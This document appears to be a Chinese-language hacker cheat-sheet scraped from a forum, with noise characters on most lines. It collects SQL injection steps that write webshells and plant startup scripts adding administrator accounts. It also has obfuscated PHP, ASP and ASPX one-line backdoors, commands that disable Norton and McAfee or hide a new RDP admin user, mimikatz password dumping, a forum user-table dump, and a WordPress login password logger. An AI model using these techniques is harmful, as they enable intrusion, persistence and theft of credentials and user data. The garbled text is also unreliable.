. a' E6 [; O. J' a/ \
查询sql server 2005中的密码hash
/ {- q! G6 J  s& U" D  ISELECT password_hash FROM sys.sql_logins where name='sa': d$ y& e9 G/ W0 R8 p7 i0 g( T  ~
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a9 Q" Q4 C! ^/ @% m6 j
access中导出shell. E& _$ p" J5 S0 V, g% ~5 o  Z5 `

6 A& o) Q) [/ h; W6 s. {6 A中文版本操作系统中针对mysql添加用户完整代码:. [* B& d0 l. c' \9 C: L
; l1 _# c# K1 x; c% f
use test;
- Y: T+ u# X; |5 P- `create table a (cmd text);
1 I2 I& w9 b% k7 V& h& [2 E; winsert into a values ("set wshshell=createobject (""wscript.shell"") " );
6 N" _* Y1 i0 t3 ?insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
- t+ E9 _8 T% U9 Z% Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );  b' e5 G! @* r; f) s. d8 S
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";4 g0 Y, ^9 M1 E8 C1 |  L6 Q7 \
drop table a;
! P/ c0 A( ~* _! E: q
/ d4 T- f) `1 ^6 a2 }英文版本:
+ W; n6 Q  N' D, F6 R1 p0 L- {. i
+ T( y0 |0 R1 d+ r' tuse test;
9 }) Y9 ~: U, W  c5 ^& ecreate table a (cmd text);
. }+ x  A0 [, A: g: zinsert into a values ("set wshshell=createobject (""wscript.shell"") " );0 p3 j9 q9 T' M- H8 P$ E4 B
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );3 S. S3 F6 V2 v7 i8 L( ^3 x
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
; g& e0 L& a0 K) bselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
2 j5 P# M9 [/ odrop table a;
/ c6 [  ~& o1 c
1 e7 N/ x! P  G0 ~: Ocreate table a (cmd BLOB);+ l% P" b/ ~$ _# }4 f
insert into a values (CONVERT(木马的16进制代码,CHAR));. w7 l4 q8 d/ Z7 e
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'1 m( s# d0 d5 |8 q
drop table a;
4 d( W. ]. U# [# B
9 z8 P9 l" i; R6 h1 {7 ?! U9 e记录一下怎么处理变态诺顿) a( b: P3 W: q" Y7 V3 ]+ x2 C
查看诺顿服务的路径
5 y, v5 J& |& P, B- i) tsc qc ccSetMgr" A, r$ M8 |7 y3 d3 y  h
然后设置权限拒绝访问。做绝一点。。
+ g9 }1 K% f( R7 A% hcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
8 W8 A, K* m+ s2 }cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"+ m5 y% Y. |* ?5 t$ E  K% C' o  @
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators( F- S/ b( i* D8 E3 t2 m' G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone6 |- W& @; O5 j# \0 K$ I) A  X* m

" S* j% O& U  J0 o, h- i然后再重启服务器
0 y+ p- P+ T4 |2 Diisreset /reboot
& @9 ]; K+ u% L* M9 J$ i: P6 s这样就搞定了。。不过完事后。记得恢复权限。。。。& O( ]) I( u5 S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
$ J+ _; r5 _- x8 }6 [% \& ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F9 `% D" |; u" i) h3 j9 L* c% w3 U& r
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F: y4 V% _& x( h6 w( b9 S
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
+ B" S3 i) {" G* q% T, c- NSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin( Y1 n" ~0 P' M9 ^
" m1 ~8 f  m- R
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
( Q3 c9 w& M) ?3 ~' u
* U: a1 x% H* p8 E3 Npostgresql注射的一些东西$ ]1 I1 R; C. W4 t6 S8 ~5 k
如何获得webshell, b5 [# M3 H% e: N; z, Z- y
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 0 T# X  j8 z! |8 @% }( a8 @! x
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); " Q, O7 R6 U, \# u
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;- ?  }1 k  I) F
如何读文件
. K% w$ g8 w2 {' U8 b2 u) ahttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);  F$ j# _; n/ s& V) ~9 i$ @
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;7 @' o! A) g$ Q2 j2 g1 l  W
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
- D% U' r+ B6 ~" h8 \, v; h6 y! F6 O' L& r7 w! \- W
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。- ]" A, [+ d. L9 `! }1 }$ p! S, _
当然,这些的postgresql的数据库版本必须大于8.X
( n* L9 V: t2 L# f" V- ]( M$ P创建一个system的函数:
6 w+ q9 ~1 I9 S9 g; W( P% kCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT0 D5 y0 T5 I, L% H, k
) V3 ]4 x0 a0 ]* C% y7 C/ }
创建一个输出表:, {1 i& `& P2 c: M& i
CREATE TABLE stdout(id serial, system_out text)$ {/ q) W5 d0 j! @5 H9 ?
/ x# b+ r4 q& V- |* }+ X5 Q
执行shell,输出到输出表内:
4 C7 w2 ?% ^$ i- k2 `0 x* e; W; L' q! sSELECT system('uname -a > /tmp/test')" i. S1 B% j& }, q2 Q( i& q
# F; y/ G2 h- y( Z' N$ t7 d
copy 输出的内容到表里面;
5 z- F! {4 q' r$ RCOPY stdout(system_out) FROM '/tmp/test'
9 l6 P& `$ k+ C- q6 x2 K9 R% m  J* L) V8 {. U. Z) ?9 K
从输出表内读取执行后的回显,判断是否执行成功
  B( u- T  x: F
6 o' B5 L4 [; N" M% B! x3 {# t: U% FSELECT system_out FROM stdout
! |% ]- b1 ]  D6 n! Y下面是测试例子
( s* S" v0 R/ Q9 o+ n0 ]+ r* T$ Q# Q2 b- [
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
2 `- ?0 x, n" J' a, l
. M$ L: d2 T% e$ D# M/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'  ^' k3 ]" q2 b' n) q. q+ y
STRICT --
; z  M3 O' n& f+ P# M8 g% [$ H1 P" M( x3 U6 ~
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
; i" G5 E5 C5 ^1 D; A# c9 l4 c
. G- }& e; L# x/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --) @  t' i/ \; y3 ]3 ^, a/ @

! J" B7 Q3 u0 Z/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
* N' R: H4 \: f- |/ s5 unet stop sharedaccess    stop the default firewall
3 W  @# V, a7 `netsh firewall show      show/config default firewall
, t: A2 {: y& E; h* nnetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
1 g7 A) P& H: h9 D! Y" J5 Vnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall
2 t  g! w6 X' p修改3389端口方法(修改后不易被扫出)
  q% N3 H8 y% R" u( U9 w修改服务器端的端口设置,注册表有2个地方需要修改/ M. Z2 s/ m4 {! W, I
! |; }1 X/ c# {, h# _5 ^0 S5 o
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
) M$ a! ]2 I' Y# n! S0 FPortNumber值,默认是3389,修改成所希望的端口,比如6000( d& P3 N/ k5 r# U3 G' W* ^- Q
, \# C" ]. Q3 }2 ], R
第二个地方:) h+ u5 f: \( {/ C' U. g$ \
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
' o' t# d, i5 T/ y0 ~" Z  gPortNumber值,默认是3389,修改成所希望的端口,比如6000" r5 O/ V, {7 N# `3 Q1 A

& m# Y- G; ], O: a# v6 q现在这样就可以了。重启系统就可以了
( h, |* Y  O( _: ~$ l$ K
, d# L  {! Q; x' y# k7 U查看3389远程登录的脚本; _2 X0 A4 \7 A7 l+ O
保存为一个bat文件
2 x* y+ o: m2 p2 u" z4 B2 cdate /t >>D:\sec\TSlog\ts.log
( L7 R, j, ^3 @* y: s1 rtime /t >>D:\sec\TSlog\ts.log2 e3 H8 V, u' u/ y
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
; z: W- t2 {1 `& ^start Explorer
3 ?, n% Q  E9 {0 _# l8 K- P" ?( E; c7 f9 O( Q8 C
mstsc的参数:
& U( f; e! C* Q% G% e* h* S3 n! @/ d. f0 `
远程桌面连接
8 \; `1 [- ]$ ~  D; u1 N! y& ]- r$ t# |2 [/ [
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
, W6 s2 k% Z. h" q  D: G; ^  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?$ O- B+ F$ i' g4 Q
8 s6 T0 \7 U- J/ z, ]9 U
<Connection File> -- 指定连接的 .rdp 文件的名称。0 S$ I( ~8 Q) d/ G& `* X
2 e) o0 T/ |/ p% f! A/ G
/v:<server[:port]> -- 指定要连接到的终端服务器。5 g; y  X9 Y( ^4 M7 c
, q8 }5 g# I" J2 \: x, j
/console -- 连接到服务器的控制台会话。1 D" C' v, U& [. w4 g/ z7 N
* T/ U2 I; O& _6 E* B
/f -- 以全屏模式启动客户端。
0 ?4 R% w- _  R/ P# }7 L: B6 q7 v( E1 B- g" l& e/ ~, S
/w:<width> --  指定远程桌面屏幕的宽度。
6 X; r7 h; T4 p( C7 H7 P( }- k9 d* ~
/h:<height> -- 指定远程桌面屏幕的高度。5 D% J# v5 e* M6 r  W5 n
2 q. @0 S! q7 V. U
/edit -- 打开指定的 .rdp 文件来编辑。+ |& T' ?, A6 ]0 d" T+ M% i) A3 ~

% {* O2 V3 ~1 e9 G1 V3 A: \/migrate -- 将客户端连接管理器创建的旧版
0 Q& f  T" f/ N, P+ ]1 v7 a0 U连接文件迁移到新的 .rdp 连接文件。
8 Q1 t9 k$ k8 ]+ b9 z* j! k6 v3 u$ ?# ?. E
* v" Y) w. x% o* {4 G7 F! h
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就
5 @5 H8 c( V* _0 x) V; i& Jmstsc /console /v:124.42.126.xxx 突破终端访问限制数量. A& _* ]0 N* O, J; i

6 X4 v& W+ ?9 J& B& P命令行下开启3389
6 b+ s- @6 c3 ^9 o5 e; nnet user asp.net aspnet /add! q% I! H! e- }0 r% r
net localgroup Administrators asp.net /add& o; ?4 v; w3 \/ }' E0 o1 I9 `: Y
net localgroup "Remote Desktop Users" asp.net /add6 R3 P  B+ [, J& t" s0 \0 }4 b
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D3 {- [1 E. w$ Q" s  ]
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 07 H0 Y% h* A& c; A( V/ K4 H
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1( v* E! {" S8 t( D0 u/ m  q' j( `3 z
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f2 A0 a6 C1 U8 q* |( v. ?* p
sc config rasman start= auto8 j- R+ D9 j2 T9 W' i
sc config remoteaccess start= auto
; [* W% @8 Z  I  `net start rasman
0 `+ b$ J0 q. t4 N9 @$ d; n. Z1 cnet start remoteaccess% D$ w2 {$ e4 G. r$ y: G( k
Media+ X; [9 v, v: A- y# a7 a1 V
<form id="frmUpload" enctype="multipart/form-data"
5 {2 z8 Z( _. L2 ]- g' O3 r, haction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>' {2 E6 `" c$ p! _! I" }' n9 E% ?
<input type="file" name="NewFile" size="50"><br>! v6 r, \  ~4 o+ J0 j( T
<input id="btnUpload" type="submit" value="Upload">
# o" s; v7 v- g; ]</form>, n9 n: G, O- F5 Q

* y' A+ S% }& Xcontrol userpasswords2 查看用户的密码: |' A8 U; P7 {+ u: J- A2 w
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
3 w, K/ V8 ~9 Z$ WSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
% p/ E5 W% h& n$ U) o7 A# q) Z) |. S9 c
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
: M* O( r# y8 k) z( r2 w7 t: q$ [测试1:: I3 s3 k& e# w7 r4 E( B
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
$ d; k; k; h& h/ H
0 ^3 [9 X2 h, G0 ^测试2:
0 k- O; o( E8 G! p) `3 S2 x  }- G5 G2 ?: o: u
create table dirs(paths varchar(100),paths1 varchar(100), id int)( E4 m7 i$ L* ?6 ~6 ?( n

3 l. W  k" f  n5 Xdelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--7 z8 W3 b7 Q1 z! E6 @! u

' t$ E- |# u+ v8 B  VSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1  V7 y, D2 o& u8 I( U) O
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令8 |  E5 e& R4 D) m, c; F
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
! U9 B, d# M: n" d6 Rnet stop mcafeeframework! U% H7 T& `& s6 W! B( |: F: @5 T
net stop mcshield- x1 I$ X+ g. n" {* k* ?+ u
net stop mcafeeengineservice) J0 R& g& W4 ^) n
net stop mctaskmanager1 g3 p$ X. R/ B# Y& i( i
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D3 w& Q' _* o" C6 I$ }1 v
- a5 g0 O% d! i6 c5 R5 T) v3 A, y
  VNCDump.zip (4.76 KB, 下载次数: 1)
2 S+ @* W2 q! w" Z- G" v密码在线破解http://tools88.com/safe/vnc.php
4 J) @# g4 p# OVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取+ d- ]+ K0 V; R* \
# U. L4 P% l; N
exec master..xp_cmdshell 'net user'0 G9 |/ G6 z! B$ O1 W
mssql执行命令。1 U# |: Z  `9 c. f- F; r) R
获取mssql的密码hash查询6 Z+ b7 w' N  p% }7 O
select name,password from master.dbo.sysxlogins+ p  e! X, w- |* h

% Z! X5 r6 M( [backup log dbName with NO_LOG;8 v) u2 f- \4 s9 c/ N7 G8 i- R
backup log dbName with TRUNCATE_ONLY;
" Q% Y! C' T9 q/ A9 h3 O( ADBCC SHRINKDATABASE(dbName);" C9 S1 B4 h. Q: I0 K2 ?. W  ~
mssql数据库压缩: q. a; ]/ d& s' M$ m# P1 d1 x" r

, n+ O- _/ P, K* t) YRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
; a2 l: E5 u5 `将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。, r- A* z) o( Q. C
0 ?! R9 S7 f+ \1 |
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
: m# x/ W; P' H* q  z" F- B+ T备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak  w; B3 v' B# X) v2 e

' X, N8 s% n0 E% J0 e* aDiscuz!nt35渗透要点:$ p( D2 k" s% G2 V
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
" s( y- J2 r0 x* P3 V. H$ j(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>/ G1 O9 C8 n( ]5 P% a# _! l
(3)保存。
: S' ?3 a) L4 M+ L" {& @(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass: n1 \# b0 u6 w) f
d:\rar.exe a -r d:\1.rar d:\website\9 i3 A+ i8 Y; v. U* c: o7 {9 c
递归压缩website
, W' |+ H8 V% h: H1 D' B注意rar.exe的路径
8 m9 i* d" z" D
+ N! G5 `! ~# N: n' |8 t; r% q<?php  G" Z/ l4 J& S+ K- r
) ~8 c% T! }9 o
$telok   = "0${@eval($_POST[xxoo])}";
1 E/ z$ I$ [) O% F1 k2 d+ S5 ~2 z: e1 e2 \; E9 B3 d
$username   = "123456";
- M2 F% s5 D4 R5 C
( B( C! A/ ~4 [$userpwd   = "123456";: N2 o' B( e, |" N' Y3 n7 K% E

$ F, c$ g* r0 ~" h$telhao   = "123456";
+ J; q4 J1 v' X+ G1 D$ ~) w7 R8 S- n  n3 V
$telinfo   = "123456";7 r8 A% ?3 R+ n' P+ A; [

2 o+ ]6 J: K& k. e3 u?>
( S4 J" N* s; D( q4 a/ sphp一句话未过滤插入一句话木马
% k8 c* [$ i, D! z0 L2 d: X' W) n% \  M) f, L: |3 ^
站库分离脱裤技巧
- ^& E. u, ^$ p" m6 ^. \exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'6 x  E" S4 r# G
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'+ V4 _# b3 `3 X* D' w; i
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
" B: c7 S% v8 F4 O& @/ k& D这儿利用的是马儿的专家模式(自己写代码)。
- {* B/ Y1 k% M* E# ?9 oini_set('display_errors', 1);
0 ^' I0 z! {9 F4 n; Vset_time_limit(0);; R4 ], _* }2 p; [. i
error_reporting(E_ALL);% n4 H1 g5 Z5 n" {4 n( ]0 b
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
. e/ Z( f  S1 C" z& ?. J$ ]5 ~mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());, Y5 _/ \+ O' o9 H* a/ J, s  e
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
5 d2 y; `* g8 R. ], Y! z: V7 ]$i = 0;5 v. L' E% G- B6 N! h
$tmp = '';
0 S1 C% }" D1 c$ `( t9 d1 G* Kwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
( d; S/ G' e6 j2 x. Z    $i = $i+1;
0 O& A* `' d3 P; v% v4 n+ t2 Z    $tmp .=  implode("::", $row)."\n";
! [. h0 O) o+ m0 i/ P9 g# t    if(!($i%500)){//500条写入一个文件5 D% s+ p* i0 `% M5 C! @$ H# V$ T9 q
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
8 F/ [, T( O  N- p( I  j& I        file_put_contents($filename,$tmp);7 y/ i0 P# r0 \' E
        $tmp = '';
0 e" S$ U% C% M$ t    }
' W( C" {7 q$ Y: E7 D}, I& y# P( H. ?1 {! l
mysql_free_result($result);
7 X$ Z- {# ?8 X& i! n1 Y; Y8 R4 [- E. ~# S8 M: V
) c2 P" c; v/ S  }7 ^- R; z

7 L9 x& A) k- w: z4 A* X# E//down完后delete0 ?4 g2 M* z" F
3 W1 _9 r* ]( `7 C. S  r$ ^

) u  h  |: G& r8 I. @ini_set('display_errors', 1);
' K" _+ D6 X$ G' n( C5 j1 eerror_reporting(E_ALL);
9 t. N7 u7 [. }5 ^2 u$i = 0;) G  o0 y0 g9 Y6 E( h) }
while($i<32) {+ ?6 F! I/ L' n
    $i = $i+1;
5 q5 z& }7 G* ~7 X0 l3 E. i  k        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
, g7 m+ ^0 C9 q6 ]" Q        unlink($filename);
# y) L- v  X' h* S; s6 v- k} % A: A3 T: @3 f
httprint 收集操作系统指纹
5 [/ h# B- Q) G) f2 [. k; H, G扫描192.168.1.100的所有端口- y( x" ?8 A, I7 e4 n1 W
nmap –PN –sT –sV –p0-65535 192.168.1.100- L9 R  s' z3 k- K! a/ S. D3 \
host -t ns www.owasp.org 识别的名称服务器,获取dns信息" P; {2 C$ Z) E9 Y- T  z9 @  x
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
4 Y. m( H( ~$ f) YNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host6 J# j( D" P0 O) ^' ]) O) [

* J8 N1 U" `0 ^4 O7 w! l4 fDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)2 n8 j% u  i) {, v
- C- t6 W* t! F# b  p
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
' d1 J% `8 J, I, p- x( D
2 ^$ g5 U. N- m- h3 j, g, t. S  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x! L2 p; e+ n+ p' f

' t; E, f8 M/ R- R' M- Z& E8 D  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
, D. X1 [+ ?3 @5 l+ e* n' x6 c0 ?; `6 O0 t
  http://net-square.com/msnpawn/index.shtml (要求安装)
2 N0 x" s2 H8 s+ e" b: |% M  s, `8 [
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
9 |6 [7 B% q( g- Z5 L4 V$ f# }5 f7 @% y  G# i
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
# e) ?- }, V* b1 tset names gb23120 v" w7 l9 u) n. A2 {4 s9 p3 A" n
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。# i! S' E# B8 q" H

  @" }: |8 L  c- _& Dmysql 密码修改
3 R# A7 H8 W% QUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
% w6 q$ Y& U! k( }+ mupdate user set password=PASSWORD('antian365.com') where user='root';& `6 \/ h/ @7 {% N1 O' Z
flush privileges;! A. n5 J% @- u
高级的PHP一句话木马后门$ }( j* d( ~5 x* `7 m1 M) f
5 q6 t; m) W: ?4 E
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
8 k7 T* K* P) s- n9 S. L9 `5 C
4 H7 x( b) F! y) B) |1 j+ I2 T+ n1、
" [1 ], \, ]  O& d( n
! d: w% D1 k/ E+ d% y$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
% J! \" ~2 F2 H7 p
( K7 O! Q: m, M1 q4 V* R# S$hh("/[discuz]/e",$_POST['h'],"Access");! `. _! h# {5 R# j4 o1 l# t

2 }: j/ A8 B* m6 y! _//菜刀一句话- f0 X- e! X( M: L

* y( L% o3 N: l& h& ~2、9 k8 g3 n2 C) K* a: y# y6 I
' H: n0 t0 h8 P  j. H
$filename=$_GET['xbid'];  r: u. B. B- Z/ `  ?% K

. z* J2 b* ]9 E, C! n4 x4 cinclude ($filename);' g4 A8 J; [" M6 i0 k& T2 d# H

! z' _& y* r5 b8 J: ~- m5 K//危险的include函数,直接编译任何文件为php格式运行
9 r! y- Q' _" E- ]
( K- M& m0 q3 r/ c, c3、
8 N6 N6 a% H' I' D- ~3 E6 z1 o
( w/ O( i. c4 v* h+ l! t$reg="c"."o"."p"."y";7 L7 n+ B$ ~( Z. A; D0 I% R
" E6 K# |6 f6 {, b. u
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);. c) J% L1 J$ `+ c
5 _/ U% [% {: d- W% H
//重命名任何文件
) ^* {- \9 n# N, C, ^# E$ }% L9 y: m/ V+ Y
4、* W( r  |- a6 _& Q$ r1 h7 L. z  x* ~

3 @. c. O* E% N5 r. o$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
! w1 v1 ~! b3 F. y% J- `% a1 _; |( \3 f) p5 g
$gzid("/[discuz]/e",$_POST['h'],"Access");* @: U6 e9 V0 i
, ^/ x  ]8 K- w; `, r5 ^% `& U
//菜刀一句话
+ M- D& Y8 q# n
6 s" ^/ Q0 r) q( X) ~* M5、include ($uid);
/ a7 E! O' a/ h1 i% I1 [0 [* k  p2 V8 [1 ?
//危险的include函数,直接编译任何文件为php格式运行,POST : `6 T0 _( p2 _: U) @
- ~6 ^1 {# M; b  n' b5 d$ y

# B- ?( ~& u' T5 Q//gif插一句话
/ V9 W. ^' o5 ?' B1 j  W
6 o- B6 |+ ^* X6、典型一句话
3 T: ~5 n5 ^1 L# Y! x
) \* X' R+ ]1 j% I" Y程序后门代码
$ Z4 r; D- [, Q! @<?php eval_r($_POST[sb])?>* w& V0 j; ?" ^7 o
程序代码6 u' k" D2 X9 F/ j
<?php @eval_r($_POST[sb])?># I" v. X& w6 H) v
//容错代码6 y, I7 u7 J0 u' U3 t
程序代码1 p7 V5 M8 r" a2 {, M. J
<?php assert($_POST[sb]);?>' f9 T9 \* `) Y& R
//使用lanker一句话客户端的专家模式执行相关的php语句/ P( j0 i7 e' W) Q9 k2 B; z
程序代码
( n' M" r1 I) Y! G9 N* P& B<?$_POST['sa']($_POST['sb']);?>
+ o3 M: R' C; i. b程序代码9 v- h" P# s3 A/ e) M( x1 l
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>  Q: r# m4 S1 u' ]
程序代码
# E0 s2 h# Q; b. Q$ S( N, `<?php
5 }% [1 K& P/ O7 z1 S% L+ n@preg_replace("/[email]/e",$_POST['h'],"error");7 _# j1 l, e; e- D" ^
?>( G, K' `" D& j. a
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
3 I7 o; w( B% T' C+ v程序代码
4 n0 \5 s$ f" c4 y$ i7 [) D8 }* t<O>h=@eval_r($_POST[c]);</O>: `/ V4 c& }: t$ z9 A
程序代码
1 w+ p1 c4 J) b8 c$ I  V7 ~<script language="php">@eval_r($_POST[sb])</script>
& I- {( H3 H) [7 G//绕过<?限制的一句话
, P4 e! A, k2 K2 m$ W& I6 D  l  u; X/ I, r, H% f/ S1 W  C
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
% j; [, w7 \+ U& G1 s7 }3 @" M详细用法:9 i4 V/ Z) w8 |: e! _3 r, n
1、到tools目录。psexec \\127.0.0.1 cmd
; j( V8 B8 m: w% D" z2、执行mimikatz
  ^0 b) P7 I- X/ \3、执行 privilege::debug
2 L& J, D% I# i3 W4、执行 inject::process lsass.exe sekurlsa.dll0 x( d% n6 C6 O+ Z& ?
5、执行@getLogonPasswords
! n( B; x! z$ x+ m7 ?6、widget就是密码5 m6 @* S) m9 L
7、exit退出,不要直接关闭否则系统会崩溃。
, c8 e% t# d5 g# W& s! _! z' [
( [, C# n& l8 L1 dhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
, P& _1 o- `5 K0 D  U6 v1 h3 J& a
0 J: m+ k8 j1 D8 b自动查找系统高危补丁
. P7 H. h/ P! _2 g( K! f! Osysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt$ {; n, S% y6 d, c# o/ ^7 F. B
& {! q, v% v3 _1 ~5 c  }. g, K4 ?
突破安全狗的一句话aspx后门* r! U+ ]. E2 o. K( |- Q7 g
<%@ Page Language="C#" ValidateRequest="false" %>
/ }1 T) R) w# N& W' y: X<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>, b' t8 C, ~" f0 @" p4 S
webshell下记录WordPress登陆密码' D) ?2 ^9 I0 X! _) ?$ [
webshell下记录Wordpress登陆密码方便进一步社工- q9 O9 R8 D/ f
在文件wp-login.php中539行处添加:% J; p% A; Y7 U- Q8 Z7 v7 Q
// log password
* u& w" Z1 K7 x3 m4 t7 A$log_user=$_POST['log'];
; {$ A% D8 P. C( d/ D' h- w: X$log_pwd=$_POST['pwd'];
) M  K7 j! f5 p! ?1 W# j$log_ip=$_SERVER["REMOTE_ADDR"];4 G4 k% ?$ ~. M! C; e
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;) ~* R2 T* q, r& e  i) b9 \
$txt=$txt.”\r\n”;2 Z5 b( v% n( F0 `$ H( ?1 O( [' X
